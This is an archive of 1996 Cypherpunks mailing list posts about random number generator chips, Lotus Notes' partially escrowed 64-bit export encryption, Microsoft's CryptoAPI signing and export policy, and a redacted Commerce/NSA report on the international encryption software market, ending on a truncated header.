From: 	Perry E. Metzger[SMTP:perry@piermont.com]
Sent: 	Wednesday, January 17, 1996 11:00
To: 	Timothy L. Nali
Cc: 	cypherpunks@toad.com
Subject: 	Re: Random Number Generators 


"Timothy L. Nali" writes:
> 	For a class project, I will be designing a VLSI cmos chip to generate
> truly random numbers (The chip will be fabricated).  I'm limited to a
> 2-micron standard cmos technology

> The most promising design I've seen so far (that I can actually
> do) is based on clocking a D flip-flop in the following way:

I'd say that the design you have picked has a couple of problems with
it. The first is that you are, from what I can tell, building a
synchronizer, which means that you may have metastability
problems. (Your diagram wasn't completely clear so I can't
tell).

Also, you are depending on a sloppy clock and a not sloppy clock
actually having the stated properties, which means you aren't really
generating randomness so much as hoping you can detect and exploit
it. As it is very hard to determine if a stream is really random, this
makes your life difficult.  Far better to try to use some analog
tricks in the circuit itself to generate the random numbers for
you. Of course, some of these end up producing metastability problems
of their own...

Can anyone point this guy at good texts on all of this? I've never
found one...

Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 18 Jan 1996 05:16:19 +0800
To: cypherpunks@toad.com
Subject: Lotus to export 64 bit, partially-escrowed Notes
Message-ID: <9601172038.AA22875@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Alerted by a colleague at the RSA Data Security conference today, I just
checked the Lotus site. Folks may wish to look at  

http://www.lotus.com/home/whatsnew.htm

A new 'international' version of Lotus notes is being released, with
64 bit session keys, as opposed to the old 40 bit version.

24 bits of the session key are stored encrypted under a special, 
government-access RSA public key. This is in addittion to the full
64 bit key being available under the recipient's public RSA key.

The idea is that the USG would have to search only a 40-bit keyspace,
while others will need to search a 64-bit keyspace.

Reportedly, this 'workfactor reduction key' will NOT be available to 
foreign governments.

My colleague reports that opinion at the conference was divided over
whether Lotus was doing something which made good business
sense, or whether this was 'caving-in'.

Speaking only for myself

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tjm@easynet.co.uk (Terence Joseph Mallon)
Date: Thu, 18 Jan 1996 00:17:38 +0800
To: cypherpunks@toad.com
Subject: The object....
Message-ID: <v01530502ad22d89003b2@[194.154.96.141]>
MIME-Version: 1.0
Content-Type: text/plain


Dear Mr. McNally,

A correction. I did not say the statement. I submitted it. You have
constructed a context which was not in the original email. By posting just
a segment to the list you no doubt have created what you wanted.....you
remind me of a person that I know -  a journalist.....

The submission was because I felt that it would be of interest to someone,
if you did not find it so, such is life........

Your comments at the bottom of the email.....well....good luck with your
monoply, I hope you pass go soon......

Terence.

"Its funny how those who fight against tyranny eventually become tyrants."
Mr. McNally, I did write this.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee Fisher <leefi@microsoft.com>
Date: Thu, 18 Jan 1996 16:14:02 +0800
To: "cypherpunks@toad.com>
Subject: Re: Microsoft's CAPI
Message-ID: <c=US%a=_%p=msft%l=RED-09-MSG960117153737EO00EE00@red-02-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze <mab@research.att.com> writes:
| I attended a meeting at Microsoft the other day at which they
| described their Crypto API project.  As CAPIs go, it's reasonable
| enough; ...

As of today, some basic information on "Microsoft CrytoAPI" is 
available at http://www.microsoft.com/intdev/inttech/cryptapi.htm.
It looks like this page has an overview, a 25-page Programmer's 
Guide, and 5 sample apps which use the API.

In general, http://www.microsoft.com/intdev/ is the best place to 
check for any new for Internet developer-related stuff from MSFT.
__
Lee Fisher, leefi@microsoft.com, 206.936.8621





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 18 Jan 1996 05:34:49 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus to export 64 bit, partially-escrowed Notes
In-Reply-To: <9601172038.AA22875@toad.com>
Message-ID: <9601172102.AA29445@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Note that it is slightly easier to break this encryption than the 128 bit 
encryption with 68 bits sent in the clear used by Netscape.  

I think in general that any steps taken to reduce the amount of information 
avaliable. I'm happier if only the US government has access to the extra 28 bits 
of privacy than if everyone does. That is not to say that I am happy.

This is better than the government proposal for GAK which would have very easy 
access to the message content. 40 bits of privacy means that they do at least 
need to do some work. I would prefer it to be 48 at the very least.

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Thu, 18 Jan 1996 14:00:30 +0800
To: llurch@networking.stanford.edu
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
Message-ID: <199601172309.QAA12674@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself Rich Graves 
 <llurch@Networking.Stanford.EDU> allegedly wrote:
>
> An easy short-term partial solution would be to modify mailcrypt, bap, or
> whatever front end you use to automatically put the current date and (a
> shortened form of) the To: or Newsgroups: header into the PGP signature
> Comments: line. 
 

 I wrote:
> 
> A good idea, and one I was about to implement for BAP, but 
> doesn't PGP itself stick a timestamp into the signature?  
> When I verify a signature it says "verified, signed at 
> XXX time & date.".


Whoops!  I misunderstood.  The fix I am considering is putting
some information inside the *body* of the message, probably at
the end just before the signature.


Regards,

Bryce



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMP2Bj/WZSllhfG25AQHxWwP/bHmOcuAPAHdCShaeZhpLYQPJEJWyApuV
EQhA/k1TSxmowH0cPff1rBZw4+2HFzfKiWHgBO12lf6gO+ihVGq/7GAJuwEVmMb6
aNKhSRESmb2YgV8/luj401KnknSP1x3xC56wzE1mhIiN8LOtav2J+rxM398DTzEc
8mzb7dETBRU=
=ZDiw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Thu, 18 Jan 1996 08:29:24 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: A Modest Proposal: Fattening up the Proles
Message-ID: <2.2.32.19960118001348.00677b44@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:54 AM 1/17/96 -0500, John Young <jya@pipeline.com>wrote:

>   By any means, emulate elitist indolents and avoid anxiety.
>   Display iron-fisted civilized beliefs, practice tough-love
>   humiliation and master-over-slave manners and militant
>   mind-couture, but do nothing truly disruptive of the status
>   quo that so rewards niche market exploiters of genuine
>   dissent.

The patient displays advanced signs of Stephen Donaldson's Disease. We
recommend _immediate_ replacement of the TrendyLeft <tm> thesaurus and
spelling checker package with more robust models. Strunk&White GoodWrite
<tm>, say, or perhaps RichardScarrySoft <tm>.

More seriously, I recommend a re-reading (or first reading, as it may be) of
Orwell's "Politics and the English Language". I quote:

"In our time it is broadly true that political writing is bad writing. ...
Orthdoxy, of whatever color, seems to demand a lifeless, imitative style.
The political dialects to be found in pamphlets, leading articles,
manifestos, White Papers and the speeches of under-secretaries do, of
course, vary from party to party, but they are all alike in that one almost
never finds in them a fresh, vivid, home-made turn of speech. When one
watches some tired hack on the platform mechanically repeating the familiar
phrases - bestial atrocities, iron heel, bloodstained tyranny, free peoples
of the world, stand shoulder to shoulder - one often has a curious feeling
that one is not watching a live human being but some kind of dummy. ... And
this is not altogether fanciful. A speaker who uses that kind of phraseology
has gone some distance towards turning himself into a machine. ...

"Consider for instance some comfortable English professor defending Russian
totalitarianism. He cannot say outright, 'I believe in killing off your
opponents when you can get good results by doing so.' Probably, therefore,
he will say something like: 'While freely conceding that the Soviet regime
exhibits certain features which the humanitarian may be inclined to deplore,
we must, I think, agree that a certain curtailment of the right to political
opposition is an unavoidable concomitant of transitional periods, adn that
the rigors which the Russian people have been called upon to undergo have
been amply justified in the sphere of concrete acheivement.'

"The inflated sytle is itself a kind of euphemism. A mass of Latin words
falls upon the facts like soft now, blurring the outlines and covering up
all the details."

Ironically, of course, Tim May's brutal honesty (right or wrong, he's almost
always clear) is lots more "populist", the sense of being readily and widely
understood, than John Young's stale academese.

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMP2PZX3AXR8sjiylAQG6gAfPVudIcO/WocUGwVYF7GVk5GvYT7ToYnR0
76SQXeEmwuvoG0reFoJdKJEGpJ5IQTboIgIyHYmEtirteH3y1vGeeiqQfmIhtx+S
aUUtNHSOGKNUfSNvwY2Fw0Ij/3sAR16jZFmh4T1TPRW1xwgo0KYUkvB4tk5tx1sD
Hzd+D2cPJNP/WhmwntkaXhynwnlgcYyLxqwjoD4QfiEHHS0Lbv+JVWuutJpKTih0
yFnhStoD9YL0ynZwIbfqZpl7HiX3FAAQ7aNLFPyqqRajJmTO7GuQLju8T1cWT+n+
oUTzgmXLtw5FY4OOLPR6mKkLvilyb1UzmX+GG/AlA671Ng==
=qBu4
-----END PGP SIGNATURE-----

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 18 Jan 1996 05:56:23 +0800
To: attila <attila@primenet.com>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <Pine.BSD.3.91.960117091755.13335C-100000@usr4.primenet.com>
Message-ID: <Pine.SV4.3.91.960117161425.28601B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> 	you take your liberal idealism


   Permission to quote this to my friends and colleagues? They'll die 
laughing to think that someone classifies me as a liberal.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 18 Jan 1996 06:00:59 +0800
To: attila <attila@primenet.com>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <Pine.BSD.3.91.960117091755.13335C-100000@usr4.primenet.com>
Message-ID: <Pine.SV4.3.91.960117161812.28601D@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


So Attila, what exactly is your extent of familiarity with active-duty 
military folk?    You think that some O-4 going to night school has to 
get permission from the Pentagon when choosing topics for a Sociology paper?

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Thu, 18 Jan 1996 07:01:06 +0800
To: cypherpunks@toad.com
Subject: underground digital economy
Message-ID: <9601172240.AA06559@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



Question:

The existing underground economy uses the same money as the aboveground  
economy (i.e. paper money, for the most part).  Could a significant  
underground digital economy develop if the aboveground digital economy  
used only identified e-money?

Jim_Miller@suite.com

____________________________________________________________________

             The Internet is a land bridge for memes
____________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Johnston <tomj@microsoft.com>
Date: Fri, 19 Jan 1996 02:33:14 +0800
To: cypherpunks@toad.com
Subject: FW: CrytoAPI on Cypherpunks
Message-ID: <red-32-msg960118010931MTP[01.52.00]000000b5-14416>
MIME-Version: 1.0
Content-Type: text/plain


General comments:  please take a look at our web page:
http://www.microsoft.com/intdev/inttech/cryptapi.htm, and
 e-mail cryptapi.com with questions.

Comments in-line >>> below.

>From: Matt Blaze <mab@research.att.com>
To: cypherpunks@toad.com
Subject: Microsoft's CAPI
Date: Wed, 17 Jan 1996 10:02:27 -0500

I attended a meeting at Microsoft the other day at which they
described their Crypto API project.  As CAPIs go, it's reasonable
enough; nothing particularly exciting about it or especially wrong
with it (though they don't yet support nonblocking calls to crypto
modules).

>>> We received several requests at the design review to add
>>> non-blocking calls.  We're looking to add this.

					... They have
(or will have soon) an application development kit to allow you to
write code that uses the API, and a CSP development kit to let you
write the crypto functions.

>>> Doc's and sample code from the SDK are available now on
>>> our web page:  http://www.microsoft.com/intdev/inttech/cryptapi.htm.
>>> Please e-mail cryptapi@microsoft.com if you're interested in a
>>> CSP development kit.

					...One important
issue is whether MS will really sign anyone's CSP or whether they will
start charging high fees or making business-based decisions on who's
CSPs they will allow (with they sign Netscape's CSP, for example).
They say they won't even look or keep a copy of your CSP (at my
suggestion, they are probably going to change the process so that you
send them a hash of your CSP instead of your CSP code when you get the
signature).  For now they promise to sign CSPs for anyone who returns
the export certificate, at no charge.

>>> We won't charge high fees (right now, it's free!).  Our policy is
>>> simple:  we'll sign the CSP of anyone who follows the rules.
>>> Yes, we would sign a CSP from Netscape if they follow the rules.
>>>We won't look at or keep a copy of the CSP, and
>>> we won't tell your competitors about it (unless you ask us to).

						... They
say that the API kit will not be export-controlled but the CSP kit
will be.

>>> The SDK is not export-controlled.  The CSP development
>>> kit is export-controlled.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kurt Buff (Volt Comp)" <a-kurtb@microsoft.com>
Date: Thu, 18 Jan 1996 10:06:51 +0800
To: "Jim_Miller@bilbo.suite.com>
Subject: RE: underground digital economy
Message-ID: <c=US%a=_%p=msft%l=RED-06-MSG960117174830AG008800@red-03-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Certainly. There are a couple of ways, but all one needs is some sort of 
gateway to an e-cash, which is simply e-money without identification. The 
gateway could take the form of a human intermediary, with either services or 
physical goods being the medium of exchange, or simply an exchange server 
which takes a cut off the top, as happens in the street all the time in 
countries that have currency restrictions.

Kurt
----------
From: 	jim@bilbo.suite.com[SMTP:jim@bilbo.suite.com]
Sent: 	Wednesday, January 17, 1996 14:39
To: 	cypherpunks@toad.com
Subject: 	underground digital economy


Question:

The existing underground economy uses the same money as the aboveground  
economy (i.e. paper money, for the most part).  Could a significant  
underground digital economy develop if the aboveground digital economy  
used only identified e-money?

Jim_Miller@suite.com

____________________________________________________________________

             The Internet is a land bridge for memes
____________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Johnston <tomj@microsoft.com>
Date: Thu, 18 Jan 1996 10:22:38 +0800
To: cypherpunks@toad.com
Subject: CryptoAPI and export question
Message-ID: <red-32-msg960118020915MTP[01.52.00]000000b5-14588>
MIME-Version: 1.0
Content-Type: text/plain


Two points:  the CSP development kit is export-controlled; and signing a
CSP developed by a foreign vendor is treated as a export -- so the signature
is export-controlled.

We would ship a CSP development kit to a foreign vendor, and sign a CSP
developed by the foreign vendor, but only with the appropriate export licenses.

	-TJ

----------
From: Dr. Dimitri Vulis  <dlv@bwalk.dm.com>
To:  <cypherpunks@toad.com>
Subject: Re: FW: CrytoAPI on Cypherpunks
Date: Wednesday, January 17, 1996 8:37PM

Tom Johnston <tomj@microsoft.com> writes:
> >>> We won't charge high fees (right now, it's free!).  Our policy is
> >>> simple:  we'll sign the CSP of anyone who follows the rules.

Would you sign a foreign-developed CSP (which isn't subject to the rules)?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tc@phantom.com (Dave Banisar)
Date: Thu, 18 Jan 1996 07:35:12 +0800
To: cypherpunks@toad.com
Subject: EPIC: Commerce Report on Crypto Availability
Message-ID: <v02130500ad2333ac2fb6@[204.91.138.69]>
MIME-Version: 1.0
Content-Type: text/plain


        Commerce Releases Crypto Availability Report

The US Department of Commerce today released a report on the
international market for encryption software. The report, which was
jointly produced by the Commerce Department's Bureau of Export
Administration and the National Security Agency reviews the foreign
availability of encryption products and other nations' import, export and
domestic use policies.

The report finds that there are foreign products available which "can have
an impact on US competativeness" and that US export controls "may have
discouraged US software producers from enhancing the softare features of
general purpose software to meet the anticipated growth demand by foreign
markets. It anticipated that there is a steadily increasing demand for
crypto to be included in general use software products becuase of well
publicized break-ins.

A large portion of the report has been redacted by the NSA. EPIC filed
suit under the Freedom of Information Act in December 1995 to obtain a
full copy of the report and will continue to demand its release. EPIC
believes that the US goverment should remove export controls on public
domain and commerical software that contains encryption and end the policy
of demanding that key escrow be implimented in all encryption software.

Enclosed in the Commerce Department Press Release and Executive Summary
of the report. The full report is over 100 pages. EPIC will make every
effort to make the full report available in electronic form as soon as
possible.

More information on crypto policy is available at the EPIC Web Site at
http://www.epic.org/crypto/




                UNITED STATES DEPARTMENT OF
                         COMMERCE NEWS

                    WASHINGTON DC.20230

                                               OFFICE OF THE SECRETARY


FOR IMMEDIATE RELEASE            CONTACT: Carol Hamilton
Thursday, January 11,1996                 (202) 482-4883
                                          Eugene Cottilli
                                          (202) 482-2721



DEPARTMENT OF COMMERCE RELEASES STUDY ON THE
INTERNATIONAL MARKET FOR ENCRYPTION SOFTWARE



Washington, D.C. -- The growth of an international market for encryption
software is being slowed by strong export controls, both in the United
States and other major countries. Moreover,the quality of products offered
abroad varies greatly, with some not providing the level of protection
advertised.

The study, jointly prepared by the Commerce Department's Bureau of Export
Administration (BXA) and the National Security Agency (NSA), evaluates the
current and future market for computer software with encryption, which
allows users to protect their data using codes. The study also reviews the
availability of foreign encryption software and assesses the impact that
U. S. export controls on encryption have on the competitiveness of the
software industry.

"Our study provides a clear snapshot of the international competition in
this segment that the software industry faces," said Cornmerce Secretary
Ron Brown. "Better understanding of the products and the marketplace gives
us the tools to ensure that our export control policies are appropriate,"
he added.

The study noted encryption software presently accounts for only a small
percentage of the total computer software but should grow substantially as
the U.S. and other countries deveiop and expand public networks and
electronic commerce.

The study found that the U.S. software industry still dominates world
markets. In those markets not offering strong encryption locally, U.S.
software encryption remains the dominant choice. However, the existence of
foreign products with labels indicating DES (Data Encryption Standard) or
other strong algorithms, even if they are less secure than claimed, can
nonetheless have a negative effect on U. S competitiveness. The study also
notes that the existence of strong U.S. export controls on encryption may
have discouraged U.S software producers from enhancing the security
features of general purpose software products to meet the anticipated
growth in demand by foreign markets.


page 2

All countries that are major producers of commercial encryption products
were found to control exports of the products to some extent. A few
countries (e.g., France, Russia, and Israel) control imports and domestic
use of encryption, as well.

As part of the study, NSA evaluated twenty-eight different foreign
encryption software products, finding that some were less secure than
advertised. Because customers lack a way to determine actual encryption
strength, they sometimes choose foreign products over apparently weaker
U.S. ones, giving those foreign products a competitive advantage.

                                  -30-



                                  A STUDY OF
                            THE INTERNATIONAL MARKET
                             FOR COMPUTER SOFTWARE
                                WITH ENCRYPTION




[Note: This is a redacted copy of the ogigional secret decoment. Brackets
[] accompanied by the origional classifications have been used to indicate
location and size of excised classified text]


                                  Prepared by
                     the U.S. Department of Commerce and
                        the National Security Agency
                                   for the
                           Interagency Working Group on
                     Encryption and Telecommunications Policy



EXECUTIVE SUMMARY


BACKGROVND

In late 1994, the President's National Security Advisor directed that an
interagency report be prepared assessing the current and future
international market for software products containing encryption and the
impact of export controls on the U.S. software industry. The report was to
include an assessment ofthe impact of U.S. encryption export controls on
the international competitiveness of the U.S. computer software industry
and a review of the types, quality, and market penetration of
foreign-produced encryption software products. This paper presents the
joint efforts of the Department of Commerce/Bureau of Export
Administration and the National Security Agency to complete this tasking.
(U)

EXPORT CONTROLS

All countries that are major producers of commercial encryption products
control exports of those products to some extent. Control methodologies
and licensing practices vary, however, and a few countries, most notably
France, Russia and Israel also control imports and/or domestic use of
encryption. There is a significant amount of international cooperation in
controlling encryption exports. (U)

Some European and other countries apparently treat exports to the United
States of DES- based software more liberally than the United States treats
DES exports to those countries. Some countries have stated that they
generally restrict DES exports to financial end-uses. In general, no
independent verification of these licensing practices was obtained.
However, in some cases the U.S. was able to obtain DES products from them
for non-financial end-uses. It is possible that some countries may allow
these exports based on their political/economic/military relationship with
the destination country (e.g., within the European Comrnunity, or former
COCOM), for end uses that are considered legitimate commercial
applications of the technology, or, in the case of exports to the United
States, because DES is a national standard. (U)

As the technology and the marketplace have evolved, the USG export control
authorities have relaxed licensing constraints on cryptographic products
several times over the past 10 years. These changes have usually been made
after industry pressures and internal debate to balance national security
and economic concerns. (U)


DOMESTIC AND INTERNATIONAL MARXETS

While presently encryption software accounts for only a small percentage
of the total software market (1-3%), according to numerous information
security experts contacted in the course of the study, the future growth
trend for this sector is expected to be great.

The market for encryption in distributed computation, databases, and
electronic mail is beginning to expand exponentially as the U.S. and other
countries develop and popularize electronic commerce, public networks, and
distributed processing. (U)

Encryption in these environments will often be implemented in software, as
opposed to hardware, because it is generally less expensive and simpler to
install and upgrade. Absent changes in government standards, for the next
ten years, encryption software will primarily use DES and RSA-licensed
encryption algorithms. Other non-standard and company proprietary
algorithrns will be used primarily for security-specific products for
small niche markets. (U)

Certain developments are promoting greater use by the general public of
software-based network security features, including encryption, throughout
the industrialized world. They include ever increasing use, fueled by well
publicized "break-ins," of distributed databases, popular acceptance and
usage of global networks, and the development and use of electronic
commerce. (U)

These developments are ongoing at one stage or another in practically all
of the countries surveyed for this assessment. Less technologically
advanced countries, where demand for encryption software is reportedly
negligible, will soon undergo widespread development and computerization
leading to increased demand for encryption so~ware within the next 10
years. (U)

The overwhelming majority (75%) of general-purpose software products
(e.g., word processors, spread sheet programs, and database programs)
available on foreign markets today are of U.S. origin. Cornmerce
Department analyses indicate that the U.S. has few viable foreign
competitors for such products, and of those general-purpose products with
encryption features, all were found to be of U.S. origin. (U)

In the security specific software market, however, U. S. manufacturers
face competition in several foreign markets from such encryption exporting
countries as the United Kingdom, Germany, and Israel. To a large extent,
markets for these products tend to be "national. " Not only do export
controls affect sales, but local vendors of security-specific products are
at a competitive advantage in that they are better situated to work
closely with end- users and develop encryption solutions tailored to meet
the conditions of the local environment. (U)

NSA confirmed the existence of a significant number of foreign
security-specific software products with encryption features,
predominantly from Western European suppliers. Security-specific products
are usually not available on the shelf at retail stores either in the U.S.
or abroad, but can be purchased through direct contact with the
manufacturer. (U)


                                   ES-2

BXA attempted to quantify U.S. competitiveness and market share in 31
foreign countries where encryption is thought to have significant demand.
While sources in the countries surveyed had limited access to import
statistics or market literature on encryption software and encountered
nwnerous difficulties in evaluating this complex market, definite
conclusions may be drawn from the responses. (U)

Sources in 14 countries indicated that U.S. export controls limit U.S.
market share in their countries. Sources in seven countries indicated that
export controls have either no impact or no major impact. (U)

Sources in most countries indicated that the U.S. market share is keeping
pace with overall demand despite the impact of U.S. export controls, which
may promote indigenous production or reduce U. S. market penetration. In
all known cases, the U.S. holds the majority of the general-purpose
encryption software market. (U)

Three exceptions are Switzerland (where the U.S. market share reportedly
declined in 1994, while the market shares of other European countries
rose), Denmark and the United Kingdom, which reported unspecified declines
from previous years. Sources in all three countries attribute the decline
to U.S. export controls, which they claim promote the development and sale
of indigenous encryption products. (U)

In many countries surveyed, exportable U. S. encryption products are
perceived to be of unsatisfactory quality. (U)


ANALYSIS OF FOREIGN PRODUCTS

NSA used various methods to procure encryption software products from a
variety of countries and companies, as reflected in the TIS database and
other sources. Altogether, 28 products from 22 foreign producers in 10
countries were acquired for the purposes of this study. Of these, 21
purportedly use the DES algorithm, while the remaining 7 use proprietary
algorithms. (U)

[




                                           ] (S)





                                    ES-3

ECONOMIC IMPACT

In the absence of significant foreign competition, the impact of U.S.
export controls on the international market shares of general-purpose
products is probably negligible. Customers are often unaware of the
encryption features in these products and primarily base purchases on the
features implementing the primary function of the product (e.g., word
processing or database). (U)

[



                   ] (S)

BXA attempted to quantify the economic impact of export controls on the
U.S. software industry by forwarding a detailed voluntary questionnaire to
206 software vendors and other interested parties. Thirty six encryption
software manufacturers provided completed surveys out of the 71 returned.
By and large, the companies were unable or unwilling to quantify the costs
of export controls, but did provide substantive explanations of how and
why they believe they are adversely affected. (U)

Some general-purpose software companies claim that export controls have
affected their plans to expand security features to meet anticipated
growing demand. These companies believe that they could expand their
domestic and international customer base with such features. (U)

The export licensing process itself is not a major obstacle to U. S.
competitiveness. Only seven survey respondents use the Department of State
licensing system. While they continue to have some complaints about the
administrative burdens and time delays associated with State's process,
several noted that there had been improvements in recent years. Only two
of the survey respondents had been denied licenses by the Department of
State. (U)

Numerous survey respondents indicated that they avoided applying for
export licenses from the Department of State altogether. Some larger
companies whose products tended to be general-purpose in nature either
developed two ~fersions of so~ware, or incorporated an encryption
algorithm they knew would qualify for Commerce general licenses. (U)

Many smaller, security-specific software firms, on the other hand, elected
to limit their sales to the domestic market only. These companies
indicated a high level of foreign interest in purchasing their products,
and therefore lost potential sales. While it is difficult for them to
quantify their potential market, they believe it to be sizeable. They
claim their small size limited their ability to develop two versions of
their products, and the fact that their products were for secunty purposes


                                  ES-4

specifically requires them to incorporate strong encryption. Only one
company was able to provide specific examples where a foreign competitor
o~ta ned a sale due to an export license denied by U.S. authorities. (U)

There is little evidence that U.S. export controls have had a negative
effect on the availability of products in the U.S. marketplace. A broad
range of products with secure algorithms exist in the U. S. market and
availability of products is based principally on the level of customer
demand. Export controls may have hindered incorporation of strong
encryption algorithms in some domestic mass-market, general-purpose
products, since some companies find developing and maintaining two
versions of a product infeasible. (U)

The existence of foreign products with labels indicating DES or other
strong encryption algorithms, even if they are less secure than claimed,
can nonetheless have a negative effect on U.S. competitiveness. Most
encryption users base their purchasing decisions on the advertised product
features, along with price, company reputation, etc. (U)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 18 Jan 1996 11:09:08 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: A Modest Proposal: Fattening up the Proles
Message-ID: <v0153051ead22bbd79971@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Tim May:
>(Ironically, I brought up the new book, "The Winner Take All Society," at
>the last Cypherpunks meeting. No time to discuss it here, but it confirms
>my strong belief that we are heading for a economy in which a shrinking
>fraction of workers have really valuable things to contribute, and a
>growing fraction of the population does not. I had not recalled the
>authors, but Strick had a battery-powered laptop and Metricom wireless
>modem, and ran an Alta Vista search from where he was sitting: ROBERT FRANK
>& PHILIP COOK, The Winner-Take-All Society, New York: The Free Press.)

See also _The End of Work_ by Rifkin. It chronicles changing work patterns
from agriculture through mass manufacturing and the service age on to an
uncertain future. Lots of interesting numbers and "look what is already
happening" statements. It also shows that the changes are inexorable, just
as the decline in agriculture based on human and animal labor was.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <Alan.Pugh@internetMCI.COM>
Date: Thu, 18 Jan 1996 07:59:40 +0800
To: cypherpunks@toad.com
Subject: Crippled Notes export encryption
Message-ID: <199601172347.SAA19227@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -- [ From: Alan Pugh * EMC.Ver #2.3 ] --

Since this is definitely on-list, and I haven't seen 
anything on it here yet, I'm posting the whole thing. 
Apologies for duplication.

Date: Wednesday, 17-Jan-96 04:23 PM

Subject: infoMCI FLASH - Lotus-Security - Lotus Announces C

[infoMCI FLASH]
                                i n f o M C I  F L A S H

infoMCI (sm)
Lotus-Security - Lotus Announces Compromise for Export of Strong
Encryption

By ELIZABETH WEISE
AP Cyberspace Writer

SAN FRANCISCO (AP) _ Lotus Development Corp. announced a
compromise with the federal government Wednesday that will allow it
to put better security features into the international version of
its Notes program.

While the arrangement assures the government it can access data
under extreme circumstances, it represents an advance in the
strength of security allowed in software exported from the United
States.

Federal law prohibits the export of certain high-level
encryption programs, which are defined as a munition under a Cold
War-era arms control act.

Encryption programs take ordinary data and put it in secret form
that cannot be accessed without the proper data ``key.'' The
government's arbitrary standard for cracking encryption programs
when needed is at a technical level described as ``40-bit.''

Some software programs sold in the United States, including
Lotus Notes, now use stronger 64-bit encryption. Lotus has been
under pressure to bring such security to Notes users overseas.

Although 40-bit encryption is quite strong, highly-sophisticated
attacks using several computers have been able to break it
recently.

``Our customers have basically lost confidence in 40-bit
cryptography,'' said Ray Ozzie, president of Iris Associates, the
unit of Lotus that developed Notes.

``That left us in a bind. We are the vendor that's supposedly
selling a secure system to them and they are saying it's no good,''
Ozzie told a standing room audience at the RSA Data Security
conference.

Changes in the general export laws seemed unlikely so Lotus
negotiated an interim solution.

The export version of Lotus Notes 4.0, which went on sale last
week, includes 64-bit encryption but the company has given the U.S.
government a special code that unlocks the final 24 bits.

For companies that use the international version of Notes, it's
as if Lotus put two strong locks on a door and gave a key for one
to the U.S. government. Thieves have to get break through two
locks, the government only one.

``This protects corporate information from malicious crackers
but permits the government to retain their current access,'' Ozzie
said. He acknowledged the solution was only a compromise and said
Lotus wants to see better data security methods developed
worldwide.

However, many participants at the conference saw the move as a
cosmetic answer to the tension between corporate desires for the
best security and government's interest to access data when
necessary.

``It's a useful stopgap measure that has no value in the long
run,'' said Donn Parker, a senior security consultant with SRI
International, a computer research company in Menlo Park, Calif.

Simson Garfinkel, author and computer security expert, said he's
not sure international buyers of Notes will like the solution.

``Foreign companies don't want the U.S. government to spy on
their data any more than the U.S. government wants foreign
companies to be able to spy on theirs,'' Garfinkel said.

International Business Machines Corp. bought Lotus in July,
citing the success of Notes, a sophisticated communications and
database program.

AP-DS-01-17-96 1619EST

  (66413)

*** End of story ***




- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMP2KdioZzwIn1bdtAQGdegF9GVCEfL50vWd7e5XX/mKEnzGy5YGvW0iD
rNPCmz3Xxf3h9wOVJMLrCeDGwe4/m84g
=6jpa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
